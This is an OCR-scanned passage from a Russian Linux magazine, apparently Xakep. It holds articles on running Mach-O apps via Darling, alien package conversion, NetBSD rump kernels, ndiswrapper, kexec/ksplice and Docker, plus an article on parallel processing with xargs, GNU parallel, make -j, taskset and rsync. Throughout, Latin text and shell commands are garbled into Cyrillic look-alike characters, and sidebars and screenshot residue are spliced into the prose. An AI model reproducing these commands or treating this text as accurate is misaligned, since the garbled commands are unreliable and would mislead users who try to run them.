гот@гот-4е$Ктор:-$ 21% с1опе ВЕ{рз: //211ПиБ . сот/ап{1Каптее/Би119гитр . 58.8211 


С1оп1пр 1пфо 'Би119гитр.$В’... 


МАВМТ№б: рпоте-Кеуг1пр:: соу19п'+ соппес{ фо: /+тр/Кеуг1п-112Е1$1/рКс$11: № $ис 


В 111е ог 91гесфогу 
гетофе: Соип{1пр обБ]ес{$: 1518, допе. 
гетофе: Сотргез$1пр об]ес{$: 100% (738/738), 4опе. 


гетофе: То{фа1 1518 (4е1{фа 766), геизеа 1495 (де1фа 747) 
Кесе1\у1птр оБ]ес{$: 100% (1518/1518), 294.26 К1В | 188 К1В/$, допе. 


Кезо]1у1пр 4е1]{аз: 100% (766/766), допе. 
гот@гот-дезКфор:-$ | 


Получение БиЙагитр.$В 


ехроге 10_тТВКАВУ_РАТН=/ич$г/1оса1/116 
еспо ехроге 1О_1ТВКАВУ_РАТН=/ч$г/<= 
1оса1/116 >> -/.БазИгс 

таке 

°идо таке 1п${а11 


5 6 5 6 


СМУ$ер СогеВазе, являющийся аналогом 
СогеРоипааНоп, тоже необходим: 


$ 21 с1опе НЕЁрз: //э1ЕПиЬ . сот/впизер/‹= 
пи5фер-согебазе. 21% 

$ са впи$ер-согебазе 

$ ОВЭСЕЕАб$=-Е61оскК$ СС=сТап8 «= 
СХХ=с1апя++ ./сопйвиге 

$ таке 

$ зиао таке 1п5%а11 


Отвечающий за рендеринг аналог Оцай? 20 — 
Ора! тоже необходимо собрать: 


$ е=1Е с1опе ИЕрз: //1ЕПиЬ . сот/впизер/+= 
впи5фер-ора1 . 51% 

$ са впи$ер-ора1 

$ ОВЭСЕЕА@$=-Е61оск$ СС=сТап8 «= 


СХХ=с1ап2++ таке 
$ сиадо таКе 1п$%а11 


Наконец, нужно скомпилировать собственно 
айпод: 


$ =1% с1опе Ирз: //е1ЕПиЬ . сот/ Е ибо$0/+= 
Даг11п8. 511 

$ са даг11пв 

$ СС=с1апа СХХ=с1апя++ стаке . 

$ таке 


Все, можно запускать приложения ОЗ Х, введя 
команду 


./9У14 <«Масп-О-файл> ‹аргументы> 


УСТАНОВКА ПАКЕТОВ ОЕВ В ВЕО НАТ 
ПОДОБНЫХ СИСТЕМАХ 

Форматы пакетов ВРМ и аеВ друг с другом несо- 
вместимы — и в одной системе эти два пакетных 
менеджера не уживаются. Как правило, необхо- 
димость устанавливать пакеты неродной системы 
встречается редко. Но если она возникла, можно 
использовать средство для конвертации пакетов 
айеп. Конечно, это не панацея — с его помощью 


517е: 5988 


гот@гот-дезКфор:-$ 


5ирре${$: п415мгаррег-зоигсе 
-11]епате: роо1/та1п/п/п91$мгаррег/п915мгаррег-соттоп_1.57-1ибипфи1_а11.деь 


МО55ит: 471656с3е55121е9154683сада577045 

$НАТ: 1068651339103511еа028а99157а{18а184с88аБ 

$НА256: са23650с{т065Б492с53с2957561126183е690692213асс154а74094582с72237 
Оезсг1р{1оп-ги: общие сценарии, необходимые для утилит, работающих с п@д15мгаррег 
Некоторые производители оборудования не выпускают спецификации на 

устройства или драйверы Ё1пих для своих беспроводных сетевых карт. В этом 
проекте реализованы вызовы ядра \М1пдом5 и МОТ$ (М№ефмогК Ог1уег ТптегТасе 
5рес1{11са{1оп) из ядра Ё1пих. Драйвер М1пдом$ для беспроводной сетевой 

карты связывается с промежуточным слоем в 11пих и работает также как 

будто-то он работает в М1п4дом5, то есть без бинарной эмуляции. 


В этом пакете содержатся обёрточные сценарии для вызова версии в 
соответствии с одним из установленных пакетов -и111$-Х.Х. 
Нотераре: В1{р: //п915\гаррег . зоигсефогре .пет/ 

Оезсг1р+1оп-т45: 371с698е53630е17699447ес2316616с 

Вир$: Пфр$: //Бир$ .1аипспрад . пет /иБипфи/+111еБия 
Ог1р1т: Битти 


Информация о пакете па!5$мгаррег-сопттоп 


можно конвертировать отнюдь не все пакеты, да 
и использовать его нужно с осторожностью. Ска- 
чаем его исходники, распакуем и установим: 


# иреЕ Иер: //ЕЕр.ае.аеб1ап.огв/аеб1ап/<= 
роо1 /тма1п/а/а11еп/а11еп_8.88.Таг. 87 

# Таг хи\ф а11еп_8.88.Фаг.27 && «> 
С а11еп 

# таке && таке 1п${а11 


Опишу некоторые опции командной строки, 
относящиеся к конвертации в ВРМ: 

.‚ -Г—_ собственно конвертация в ВРМ; 

. -/ —_ устанавливает получившийся в результа- 
те конвертации пакет и удаляет файл пакета 
из системы; 

. -0 — создает необходимый каталог с файла- 
ми, но не создает сам пакет; 

. -С — конвертирует скрипты. Использовать 
эту опцию нужно с осторожностью, поскольку 
скрипты для Убити не подойдут к ВНЕЕ. 


В качестве примера сконвертируем пакет 7$П 
и установим его: 


# мреф Ир: //500.51/ЕуКихи 

# а|1еп -г ./75И_4.3.17-1_1386.аеБ 

# грт -1\%И --подер$ „/7$П-4.3.17-2. += 
1386.грт 


Мы устанавливаем данный пакет принуди- 
тельно — а!еп в данном случае довольно странно 
сконвертировал зависимости. Если говорить кон- 
кретнее, то для установки пакета зачем-то пона- 
добился файл /61п/251, в то время как его же мы 
и устанавливаем. Также стоит обратить внима- 
ние, что имена файлов пакета тоже преобразуют- 
ся и последняя цифра версии преобразованного 
пакета инкрементируется на единичку. 

В моем случае пакет установился нормально 
и 75Н запустился без проблем. Но нелишним бу- 
дет еще раз предупредить, что этот метод нужно 
использовать с осторожностью. 


МОДУЛИ ЯДРА МЕТВ$О ВЫМОХ 

Несколько месяцев назад команде МеВ$оО уда- 
лось обеспечить работу модулей ядра МеВв$0 
в Ипих. Это может быть использовано, например, 
для монтирования разделов с файловой систе- 
мой ЕЕЗ2, а также добавления других специфич- 


ных возможностей МеВ$оО, не поддерживаемых 

в Ипих. 

Разработчикам удалось подгружать модули, 
собранные для ядра МеВ$О, путем использо- 
вания так называемых НУМР-ядер (ВиппаШе 
ЧУзегзрасе Маа Ргодгат$). НУМР-ядро представ- 
ляет собой сверхлегковесное ядро, запускающе- 
еся в режиме пользователя. Существует три реа- 
лизации выполнения подобных ядер: 

. реализация в виде процесса РОУХ. Является 
основной и позволяет запускать НУМР-ядра 
как пользовательские процессы в РОЗХ- 
совместимых системах; 

. реализация для Хеп, позволяющая запустить 
ВУМР-ядро напрямую в Вот Ц, без необхо- 
димости ставить полноценную ОС и уже в ней 
запускать его; 

. реализация в ядре Мпих, служащая для запу- 
ска ВУМР-ядер прямо в пространстве ядра. 


Замечу, что РУМР-ядра не являются виртуа- 
лизацией — предназначены они для выполнения 
исключительно модулей ядра, и процессы из хо- 
стовой системы могут их использовать. В резуль- 
тате таких архитектурных решений ВУМР-ядро 
получилось действительно легковесное — оно за- 
нимает в памяти около 100 Кб. Преимущества же, 
по словам разработчиков, таковы: 

. многие вещи, такие как стек ТСРЛР, могут ис- 
пользовать ВУМР-ядра, не требуя наличия 
полноценной ОС; 

. возможность запустить несколько НИУМР-ядер 
с различным функционалом — к примеру, тот 
же стек ТСРЛР может быть запущен для раз- 
ных целей и, соответственно, по-разному бу- 
дет оптимизирован; 

. безопасность — каждое РУМР-ядро запуска- 
ется в своем адресном пространстве, и риск 
взлома (в случае с МеВЪЗБЬ и так не очень боль- 
шой в силу ее малой распространенности), 
кпримеру, через уязвимые драйверы ФС, ста- 
новится еще более маловероятным; 

. возможность разрабатывать и тестировать 
код ядра в режиме пользователя, что куда бо- 
лее удобно, чем использование виртуалок. 


Однако это все теория, и пора переходить 
к практике. Для компиляции ВУМР-ядра необхо- 
димо получить инструмент БийЙагитр.$П, для чего 
используем Сп: 
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$ =1Е с1опе НЕрз: //=1ПиЬ . сот/ += 
ап {1Капфее/Би11агитр . $П. 21 
$ са Би11агитр . И 


$ ./Би11Тагитр . $И 


Затем нужно получить архив с модулями ядра. 
Поскольку он находится в снапшоте, а его дата 
постоянно меняется, точный адрес я дать вряд ли 
смогу. 

В моем случае команда для получения архива 
с модулями была следующей: 


Недостающий элемент 


Извлеки нужный тебе модуль в рабочий ка- 
талог. Вслед за этим, скорее всего, понадобит- 
ся скомпилировать утилиты для использования 
с РУМР-ядром, указав пути к заголовочным и би- 
блиотечным файлам. 


ИСПОЛЬЗОВАНИЕ СЕТЕВЫХ ДРАЙВЕРОВ 
МИМОО\!$ СПОМОЩЬЮ МО!$М!ВАРРЕВ 

Современный Шпих может работать с огромным 
количеством наименований сетевого оборудова- 
ния. Тем не менее отдельные сетевые устройства 
(такие как беспроводные адаптеры) в Мпих либо 
не совсем корректно работают, либо вовсе име- 


ют драйвер только под М/Ипао\м/$. Но есть способ 
запустить \\Мпаом/$-версии некоторых сетевых 
драйверов в Мпих. Для этого нужно использовать 
МО/$\М/гаррег. 

Как следует из названия, это инструмент- 
«обертка» для МО!5-совместимых драйверов. 
Он предоставляет им минимально необходимый 
набор функций пюозКгп! и Па!. И что самое удиви- 
тельное, все это работает. Для того чтобы его ис- 
пользовать, установим соответствующий пакет: 


$<и40о ар*-геф 1п$фа11 па15мгаррег-+» 


$ иреЕ НЕр: //=00.21/=5МСАЁо 


ОБНОВЛЕНИЕ ЯДРА БЕЗ ПЕРЕЗАГРУЗКИ 


В Ипих существует два решения, позволяющих свести к минимуму количество 
аппаратных перезагрузок, — Кехес и Кзрйсе. Системный вызов Кехес появил- 
ся в таште-версии ядра в июне 2005-го. Предназначается он для загрузки 
нового ядра прямо из существующего. Работает технология таким образом: 

. первым делом образ ядра копируется в память; 

. затем этот образ перемещается в динамическую память текущего ядра; 

. наконец, образ копируется на нужные страницы, и ему передается управ- 

ление. 


Преимущества данного способа перед обычной перезагрузкой очевид- 
ны: перезагрузка происходит быстрее, в случае со 5СЗ$-контроллерами нет 
нужды ждать определения устройств, относительная независимость от за- 
грузчиков и возможность быстрого переключения на другой установленный 
дистрибутив. Однако есть и недостатки. Во-первых, перед загрузкой ядра 
рекомендуется корректно завершить все процессы и синхронизировать фай- 
ловые системы, поскольку все подсистемы ядра инициализируются заново. 
Во-вторых, все устройства будут находиться в неизвестном состоянии, и, если 
драйвер написан криво, работать он не будет. 

Для практического применения Кехес необходимо ядро с включенной оп- 
цией (СОМЕ!@_КЕХЕС-=\) и пакет Кехес-+оо1$. Ручная загрузка ядра (в случае 
с Убити) осуществляется следующими двумя командами: 


Кехес -1 /мт11пи7 --1п1га=/1п1%га.1те --геизе-ста11пе 
кехес -е 


Первая команда грузит ядро в память, а вторая передает ему управление. 
При этом используется текущая строка параметров ядра. Чтобы использовать 


свои параметры, задай их в опции --ста11пе="". 


Просмотр установленных обновлений К5рИсе 


соттоп п@15мгаррег-ЧКт$ сабехЕгас* 


В ЧУБити можно также использовать Кехес для быстрой перезагрузки — 
для этого установи параметр ГОАВ_ КЕХЕС в файле /ефс/дефаи1{/Кехес рав- 
ным гие, и после этого все стандартные процедуры перезагрузки будут осу- 
ществляться через него. 

Кзрйсе же, по утверждениям его разработчиков, позволяет накладывать 
патчи безопасности на ядро на лету. При этом все работающие приложения 
работают по-прежнему, без необходимости их перезапускать. Проект был ку- 
плен ОгасЕ, и для ВНЕ, из-за конкуренции фирм, патчи платные. Это, однако, 
ничуть не мешает раздавать патчи для Убищи. Качаем и устанавливаем пакет 
(для версии 12.04): 


$ ивеЕ ИЕр: //200.81/МНА76с 
$ зидо арк -1 ./К$р11се-ирЕгаск.аеь 
$ зи4о ар*-веЕ -+ 1п$%а11 


Применение всех доступных патчей выполняется всего лишь одной про- 
стой командой: 


$ зидо ирегаск-ирегаае -у 
Для удаления же всех патчей используется команда 


$ зидо ирегаск-гетоме --а11 -у 


В целом технология эта работает достаточно стабильно — тот факт, что ее 
купила Огасе, говорит сам за себя. Тем не менее таким способом можно уста- 
навливать только те заплатки, которые не вносят существенных изменений 
в структуры ядра. 


терминал - гопотот-аезктор: = 


Конфигурирование Кехес в ЧБити 
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Затем заносим родной для Шпих драйвер 
(в качестве примера далее будет использоваться 
один из чипсетов Вгоаасот) в черный список — 
чтобы не возникло конфликта: 


/ефс/тоаргобе .а/6]аск11${. соп+ 
# <...> 
6] аск11$Е Бсм4Зхх 


В случае если драйвер находится в ЕХЕ- или 
САВ-архиве, может понадобиться сабехжгасу. 


$ саБбехЕгасЕ зефир.ехе 


Берем файлы драйвера и устанавливаем его 
с помощью па!5мгаррег: 


$ эидо па15мгаррег -1 Бспм15. 11+ 


Прописываем модуль ядра в автозагрузку, до- 
бавив строку па!мтаррег в файл /е*с/тоди1ез, 
и загружаем его: 


$ эидо тоаргобе па15мгаррег 


Если все настроено нормально, сеть зарабо- 
тает. 


ПЕРЕНОС ПО СИСПОЛЬЗОВАНИЕМ 
ООСКЕВ 

Есть множество путей для создания и изолиро- 
ванного запуска приложений в Мпих. Некоторые 
из них сложные, некоторые попроще, но многие 
требуют развертывания ФС, что может занять 
длительное время. Относительно недавно ком- 
пания Во{Сюочца, предоставляющая облачный хо- 
стинг открыла проект Ооскег. Оннаписан наязыке 
Со, предназначен для управления контейнерами 
[ХС и расширяети дополняет их базовые возмож- 
ности. Он позволяет изолировать не всю систему, 
а лишь отдельные процессы и клонировать/пере- 
носить их на другие компьютеры (естественно, 
с той же аппаратной архитектурой). Проект пред- 


Современные видеоадаптеры поддерживают горячее 
подключение — естественно, при условии наличия второго 
адаптера. Мпих (а если точнее, Х.Огда) с недавнего времени 
также поддерживает данную технологию. Это не потребу- 
етособых телодвижений со стороны пользователя: все, 
что ему нужно сделать, — просто подключить устройство. 
При этом, разумеется, должна быть установлена послед- 
няя версия Х.Ога с драйвером х!{86-маео-тодезето. Тем 
не менее стоит чуть более подробно описать, как именно 


МЕО 


Скомпилированные па- 

кеты Эоскег есть только 

для платформы хб4, для 
х86 они отсутствуют. 


назначен для переноса проектов, всевозможного 

развертывания и автоматизации распределенных 

систем. Основные его особенности: 

. возможность размещения в контейнере раз- 
личной нагрузки — скриптов, бинарников, би- 
блиотек, Чаг-файлов; 

. поскольку каждый контейнер использует свою 
ФС, не важно, в каком окружении он запуска- 
ется; 

. переносимость — он запускается на любом 
современном хб4-процессоре с новыми ядра- 
ми Шпих (рекомендуется ядро не ниже 3.8 
с поддержкой АЧЕ5); 

. изоляция процессов от основной системы 
и отдругих изолированных процессов; 

. из-за того, что эта изоляция достаточно высо- 
коуровневых сущностей, не теряется машин- 
ное время на виртуализацию. 


Установка на УБими 12.04 потребует обновле- 
ния ядра до версии 3.8, которое, к счастью, бэк- 
портировано из 13.04: 


# арф-веф 1п${фа11 11пих-1табе-+“ 
5епег1с-1%$-гаг1п8 +! 
11пих-Веадег$ -вепег1с-14{$-гаг1п5 

# гебоо{ 


После перезагрузки добавим РРА с Ооскег 
и установим его: 


# арф-веф 1п$фа11 руЕПоп-зоЕмаге--= 
ргорегЕ1е$ && ада-ар{-геро$1Фогу <“ 
рра: ао{с1оиа/1хс-аоскег 

# арт-веф ирда*е 

# арт-веф 1п$%а11] 1хс-доскег 


Ооскег установлен. 
Приведу наиболее часто применяемые ко- 
манды: 
. оскегри! — получить образ из репозитория; 
. оскег гип — запустить какое-либо приложе- 
ние в контейнере; 


ГОРЯЧЕЕ ПЕРЕКЛЮЧЕНИЕ ВИДЕОКАРТ 
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. оскег р$ — просмотреть исполняемые кон- 
тейнеры; 

. оскег а — просмотреть изменения в фай- 
ловой системе контейнера; 

. аоскег соттй — сохранить изменения в об- 
раз. 


В качестве примера давай установим демон 
Ведч!5. Первым делом запустим Ооскег в режиме 
демона и получим базовый образ. 


$ эзиадо аоскег -4 & . 
$ эиадо аоскег ри11 ибипеи 


Запуск через зидо здесь нужен по той при- 
чине, что демон запускается от гоФ{ и использует 
ИМХ-сокет, владельцем которого является тоже 
гост. Если создать группу аоскег и включить в нее 
себя, то это не понадобится. Запускаем оболочку 
и устанавливаем Весд!5: 


$ аоскег гип -1 -& ибипеи /61п/Ба$й 
# аре-веф ирдате 

# аре-веф 1п$$а11 геа1$-зегуег 

# ех1е 


Сделаем снапшот с установленным сервером. 
Для этого нужно сначала узнать идентификатор 
контейнера: 


$ аоскег р$ -а 


Полученный О нужно использовать в следую- 
щей команде: 


$ аоскег сотт1+ 69163214+7ае гот/ге@а1$ 


Наконец, запускаем Веа!$ в фоновом режиме, 
пробрасывая порт 6379 в контейнер: 


$ доскег гип -4 -р 6379 гот/гед1$ «= 
/{чзг/61п/геа1$ -зегуег 


Вед!$ готов к использованию. 


ЗАКЛЮЧЕНИЕ 

В статье было описано несколько способов сде- 
лать то, что, казалось бы, невозможно. Однако 
все сценарии рассмотреть довольно затрудни- 
тельно, тем более что *тх-системы отличаются 
гибкостью — в них всегда есть больше одного 
способа сделать что-либо. = 


и является физическим устройством. При подключе- 
нии второй видеокарты создается еще один экземпляр 
Огубсгеееп, и вся деятельность на Зсгееп дублируется 
на оба устройства. 

В отличие от подобной же технологии Хтегата, 
эта технология работает не на уровне протокола 
ХЛ1, ана уровне взаимодействия с оборудованием. 
При этом можно не заботиться о том, с какого адаптера 
сформирован вывод, — можно выполнять все ресурсо- 


МГИТИУ это работает. емкие действия на одной, более мощной видеокарте, 
При запуске Х-сервера данный драйвер грузится а затем передавать изображение на маломощную. 
Документация с помощью иае\. При этом вместо фактического ото- Технология довольно новая, временем не прове- 
по Воскег: бражения экрана Х-сервер создает абстракцию Зсгееп, ренная, но перспективная. Если у тебя две видеокарты, 


а уже на нее проецирует ОгиЗсгееп, который как раз ты можешь ее опробовать прямо сейчас. 


122 Оптхога 
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Ускорение 
вычислений 

и выполнения 
заданий путем 
распараллеливания 
процессов 


Почти все персональные компьютеры, выпущенные 

за последние несколько лет, обладают как минимум 
двухъядерным процессором. Если у тебя, читатель, не очень 
старый комп или не какой-нибудь бюджетный ноутбук, 

то, вероятнее всего, ты обладатель многопроцессорной 
системы. А если еще любишь играть в игры, то тебе доступно 
около сотни ЯРИ-ядер. Однако львиную долю времени вся эта 
мощь пылится без дела. Попробуем это исправить. 


ВВЕДЕНИЕ 
Очень редко мы задействуем всю мощь не- 
скольких процессоров (или ядер) для решения 
повседневных задач, а использование мощного 
графического процессора чаще всего сводится 
ккомпьютерным играм. Лично мне это не по душе: 
я ведь работаю — почему процессор должен от- 
дыхать? Непорядок. Нужно взять на вооружение 
все возможности и преимущества многопроцес- 
сорников (многоядерников) и распараллеливать 
все, что можно, сэкономив себе этим уйму време- 
ни. А если еще и подключить к работе мощную ви- 
деоплату с сотней ядер на борту... которая, конеч- 
но, сгодится лишь для узкого круга задач, но все 
же ускорит вычисления весьма существенно. 
Чпих в этом плане очень силен. Во-первых, 
в большинстве дистрибутивов из коробки доступ- 


ны хорошие инструменты для параллельного вы- 
полнения, а во-вторых, написано немало софта, 
спроектированного с учетом многоядерных си- 
стем. О гибкости настройки, думаю, даже не нуж- 
но говорить. Единственное, с чем могут возник- 
нуть проблемы, — драйверы на видеокарту, но тут 
уж ничего не поделаешь. 

Для начала определимся с методами распа- 
раллеливания. Их существует два: средствами 
самого приложения, которое для выполнения 
задачи запускает несколько параллельных по- 
токов (тинийгеаато). Другой метод заключается 
в запуске нескольких копий приложения, каждая 
из которых будет обрабатывать определенную 
порцию данных. Операционная система в данном 
случае самостоятельно распределит процессы 
по ядрам или процессорам (ти азктод). 


АЛЛЕЛ 


РАСПАРАЛЛЕЛИВАЕМ ПРЯМО 
ВТЕРМИНАЛЕ 

Начнем, пожалуй, с параллельного запуска про- 
цессов прямо из окна терминала. Запуск в терми- 
нале процессов, работающих длительное время, 
не представляет проблемы. А что, если нужно два 
таких процесса? «Тоже не проблема, — скажешь 
ты, — просто запустим второй процесс в другом 
окне терминала». А если нужно запустить десять 
или больше? Хм... Первое, что приходит в голо- 
ву, — использовать утилиту хага$. Если задать ей 
опцию --тах-ргос$=п, то софтина будет выпол- 
нять п процессов одновременно, что нам, конеч- 
но же, на руку. Официальный мануал рекомен- 
дует использовать вместе с опцией --тах-ргос$ 
группировку по аргументам (опция -п): без этого 
возможны проблемы с параллельным запуском. 
Для примера представим, что нам нужно заархи- 
вировать кучу больших (или маленьких) файлов: 


$ са Ео1аег/м1И/Я1е$ 
$ 15$ | хагв$ -п1 --тах-ргос$=4 221р 


Сколько времени мы выиграли? Стоит ли за- 
морачиваться с этим? Тут будет уместно привести 
цифры. На моем четырехъядерном процессоре 
обычное архивирование пяти файлов, каждый 
из которых весил около 400 Мб, заняло 1 мин 
40 с. С использованием же хаг=5$ --тах-ргос$=4 
затраченное время сократилось почти в четыре 
раза: 34 с! Думаю, ответ на вопрос очевиден. 
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- 23м13с 
| Облас 
11м40с 
7м38с 7м39с 7м40с 7.52с 7м56бс 7м57с 7Тм57с 
[9 1 2 3 4 5 6 7 8 З 10 11 
Кол /еёс/зз60/=56а сопЕ1а [+] 
ичество потоков, шт рев 


Зависимость времени компиляции от значения параметра -] 


Давай попробуем что-нибудь поинтереснее. 
Переконвертируем, например, \\А\/-файлы в МРЗ 
с помощью 1ате: 


$ 1$ *.мам | хаг5$ -п1 --тах-ргос$=4 «+ 
-Т {} 1ате {} -о {}.тр3 


Выглядит неуклюже? Согласен. Но параллель- 
ное выполнение процессов — это не основная 
задача хагд$, а всего лишь одна из ее возмож- 
ностей. Кроме того, хагд$ не очень хорошо ведет 
себя с передачей специальных символов, как, на- 
пример, пробел или кавычки. И тутнам на помощь 
приходит замечательная утилита под названием 
СМУ Рагайе|. Софтина доступна в стандартных 
репозиториях, но не рекомендую устанавливать 
ее оттуда: в репозиториях Убита, например, мне 
попалась версия двухлетней давности. Лучше 
скомпилить себе свежую версию с исходников: 


мвеЕ ЕЕр.5пи.огё/впи/рага11е1 /+‹ = 
рага11е1-1афез*.Фаг.672 

фаг х){Р рага11е1-1афез{ф.фаг.672 
СЧ рага11е1-20130822 

./сопйвиге && таке 

таке 1п5{а11 


ЕЕ 69 © 65| 65 


Само название утилиты говорит о ее узкой 
специализации. Действительно, Рага!е| намного 
удобнее для распараллеливания, и ее исполь- 
зование выглядит более логично. Приведенный 
выше пример с применением Рага!е! вместо хага$ 
превращается в такой: 


$ 15$ *.мау | рага11е1 1ате {} -о {}.трз 


Кстати, если ты сидишь под Убита или 
Кибитщи, то пример не будет работать, выдавая 
непонятные ошибки. Фиксится это добавлением 
ключа '--дпи' (касается и следующего примера). 
Подробнее о проблеме читай здесь: 6И.[у/--дпи. 

А почему мы не задаем количество одно- 
временно выполняемых процессов? Потому 
что Рага!е! сделает это за нас: она определит 
количество ядер и будет запускать по процессу 
на ядро. Конечно, можно задать это число и вруч- 
ную с помощью опции -]. Кстати, если нужно за- 
пускать задачу на разных машинах, то для улуч- 
шения переносимости удобно задавать эту опцию 
в формате -] +2, что в данном конкретном случае 
означает «запускать одновременно на два про- 
цесса больше, чем есть вычислительных юнитов 
в системе». 

Если подружить Рагайе! с РУпоп, то получим 
мощный инструмент для параллельного выпол- 
нения задач. Например, загрузка из Сети веб- 


страниц и их последующая обработка может вы- 
глядеть так: 


$ руЕПоп таКе11$5%.ру | рага11е1 -3+2 +: 
'иреф "{}" -0 - | руЕПоп рагзе.ру' 


Но и без Рупоп возможностей у этой утилиты 
предостаточно. Обязательно почитай тап — там 
очень много интересных примеров. 

Кроме Рага!е| и хагд$, конечно, есть еще уйма 
других утилит со схожим функционалом, но они 
не умеют ничего такого, чего не умеют первые 
две. 

С этим разобрались. Двигаемся далыше. 


ПАРАЛЛЕЛЬНАЯ КОМПИЛЯЦИЯ 
Собирать что-то из исходников — обычное дело 
для линуксоида. Чаще всего приходится собирать 
что-то незначительное, для таких проектов никто 
не думает ни о какой параллельной компиляции. 
Но иногда попадаются проекты побольше, и ждать 
окончания сборки приходится почти вечность: 
сборка, например, Апагоа (АОЗР) из исходников 
(водин поток) длится около пяти часов! Для такого 
рода проектов нужно пускать в ход все ядра. 
Во-первых, думаю, очевидно, что собственно 
сама компиляция (ССС, например) не распарал- 
леливается. Но большие проекты чаще всего со- 
ставлены из большого количества независимых 


Включаем поддержку НРМ 


72.3 


модулей, библиотек и прочего, которые можно 
и нужно компилировать одновременно. Нам, ко- 
нечно же, не надо думать о том, как распаралле- 
лить компиляцию, — об этом позаботится таке, 
но только при условии, что в такейе будут про- 
писаны зависимости. В противном случае таке 
не будет знать, в какой последовательности со- 
бирать и что можно собирать одновременно, 
а что нельзя. И поскольку такейе — это забота 
разработчиков, для нас все сводится к выполне- 
нию команды 


$ таке -3м 


после чего таке начнет сборку проекта, одновре- 
менно запуская до М задач. 

Кстати, о выборе значения для параметра -|. 
В Сети часто рекомендуют использовать чис- 
ло 1,5 * <количество вычислительных юнитов>. 
Но это не всегда верно. Например, сборка проек- 
та общим весом 250 Мб на моем четырехъядер- 
нике быстрее всего прошла со значением пара- 
метра -|, равным четырем (смотри скрин). 

Чтобы выиграть еще немного времени, можно 
добавить ключ '-рфре' к @СС. С этим ключом пере- 
дача данных между разными стадиями компи- 
ляции происходит через каналы обмена (ррез), 
а не через временные файлы, что немного (со- 
всем немного) ускоряет процесс. 


ПРИВЯЗЫВАЕМ ПРОЦЕСС 
К ОПРЕДЕЛЕННОМУ ПРОЦЕССОРУ 


ААА 


Тюнинг ММ для увеличения 
производительности уауа ЕЕ 
приложений на многоядерной 
системе: о(.|у/ауаГипта 
Измерение производитель- 
ности многоядерных СРУ 
при помощи МР!-тестов: 
Би.у/МР!Бепсптагк 
Если нечем занять свой 


Номера 


Если нужно выполнять процесс на каком-то определенном про- 
цессоре или группе процессоров, то для этого можно восполь- 
зоваться утилитой фазк5ет. Например, если нужно запустить 
процесс Жогтет только на первом процессоре, выполняем 


$ ЕазКзеф 0х00000001 Кеоггепе 


процессоров задаются битовой маской — 


от 0х00000001 до ОхЕЕЕЕЕЕЕЕ, хотя можно и списком (если за- 
дать опцию -с). Также можно менять привязку уже запущенного 
процесса: 


компьютер, отдай вы- 
числительные мощности 
на поиск лекарств, изучение 
глобального потепления 
и другие интересные научные 
исследования: 


И р$://бошс.регке!еу.еди 


$ ЕазКзеф -р 0х00000003 ‹РТВ» 


Эта команда привяжет процесс РЮО к первому и второму 
процессору. 


724 Отхога 
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УСКОРЕНИЕ ЗМОВТ ЗА СЧЕТ 6РУ 


Очень интересный концепт под названием Спой разработали исследователи из греческого института 
РОРТН-1С$ (Роипдайоп Тог Везеагсй апа Тесппоюду — Не!аз$, пзйще о Сотрщег Эаепсе). Они предлагают 
повысить эффективность обнаружения атак Зпой’ом за счет переноса на СРУ кода, отвечающего за про- 
верку регулярных выражений. Судя по графикам в официальной РОЁР’ке исследования (6 и.у/Спой-рот), они 
добились почти двукратного увеличения пропускной способности Зпом. 


ННН 26.8%] ТазК$: 89, 213 1Вг; 1 гипп1пд - Зузкет Мопйог А-А-д- 
9.2%] Гоад ауегаде: 9. 85 1.18 0.99 Ее \Мем 5етоз Нефр 
8.4%] 


ИН 28.4% Уре: 09:26 


ИНИНИНИННИН 29 01/1984м8] СРИ Ногу 
7/1905МВ] 100% ааа” зазря 
80% 


60% 


Ргосезз ТаШе | 5узкет [оа9 


1236 гоо+ 20 0 л 171м 69020 37768 
3577 готап 20 2604Мм 60432 11300 
3579 готап 20 2604М 609432 11300 5 
3345 готап 20 5220 1888 668 $ 


5 Иизг/БАп/Х :0 -соге -а\ В /маг/гип/1198 40% 
9 с: \Теат\1емег\Теат\У1емег_БезКфор.ехе -- 20% _ 
5 с:\Теат\у1емег\Теат\у1емег_БезКфор.ехе -- 

3 /орх/театм1емег8/{у_Б1п/м1пе/61п/м1пезе 
Е] 


52 
5 а 
- 0% 

© СРИ1:10.0% ® (РИ? : 6.1% 2 СРУЗ:100% ® СРИ4:2.0% 
4473 готап 20 
3578 готап 20 
3490 готап 20 
3395 готап 20 
2042 готап 20 
3361 гоо* 20 
3421 готап 20 
1982 готап 20 
3321 готап 20 
3389 готап 20 
1994 готап 20 
915 $у5109 20 
1065 гоо+ 20 
3456 готап 20 
3492 готап 20 
3432 готап 20 
3440 готап 20 
3462 готап 20 


27432 2244 1440 В 
2604М 660432 11300 $ 
1928М 194М 24520 $ 
1121М 110М 45944 $ 
502М 37772 24064 $ 


Тор 
4 с:\Теат\У1емег\Теат\1емег_БезКфор.ехе -- 
1 /изг/ 11 /спготтит- Бгомзег/сВго 
6 спгомтит-Бгомзег 3.76 @В 
Ю /изг/Б1п/уакиаке -5е5$1оп 1027622325629 282 В 
6 /ор{/{еату1емег8/{у_61п/{еату1емега -Т 


59. 
.4 
.9 
.6 
82 
.5 Метогу апд $\мгар Н!5огу 
.4 4.70 @В 
.2 

.6 

.0 

.64 спгот1ит-Бгомзег 

.7 

.4 

.4 

м7 

КР 

.8 

7 

.7 

.6 

.9 


86156 8944 4352 $ 
1121мМ 110М 45944 $ 
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Метогу: 610.8 МВ /2.0 В 


© Весемпд : 105 К!В/5 
4 ргосеззех СРО: 100% 


Нор в действии 


Кроме таке, можно попробовать также ртаке 
(ртаке.зоигсетогае.пет) — систему параллель- 
ной сборки, написанную на РУПоп. Для юзверей 
ее использование мало чем отличается от таке, 
а вот для разработчиков она может быть доволь- 
но интересной, поскольку имеет более обширные 
возможности, чем стандартный инструмент. 


ПАРАЛЛЕЛЬНЫЙ В$УМС 

Если ты когда-нибудь использовал В$упс для син- 
хронизации огромного количества маленьких 
файлов с удаленным сервером, то, наверное, 
заметил приличную задержку на стадии гесемпта 
Не 1$. Можно ли ускорить этот этап за счет рас- 
параллеливания? Конечно, можно. Много време- 
ни здесь уходит на задержки в работе сети. Чтобы 
минимизировать эти временные потери, мы запу- 
стим несколько копий Взупс, а чтобы не копиро- 
вались одни и те же файлы — натравим каждую 
копию, например, на отдельный каталог. Для это- 
го заюзаем комбинацию параметров --тсиае 
и --ехсае, например так: 


$ гзупс -аму --1пс1иде="/а*" --ехс1иае=е= 
"/*" -Р 1051п@5егуег:гетофе /1оса191г/* 
$ гзупс -ам --1пс1иде="/Б*" --ехс1иае=е= 


"/*" -Р 1021п@5егуег:гетофе /1оса1а1г/ 


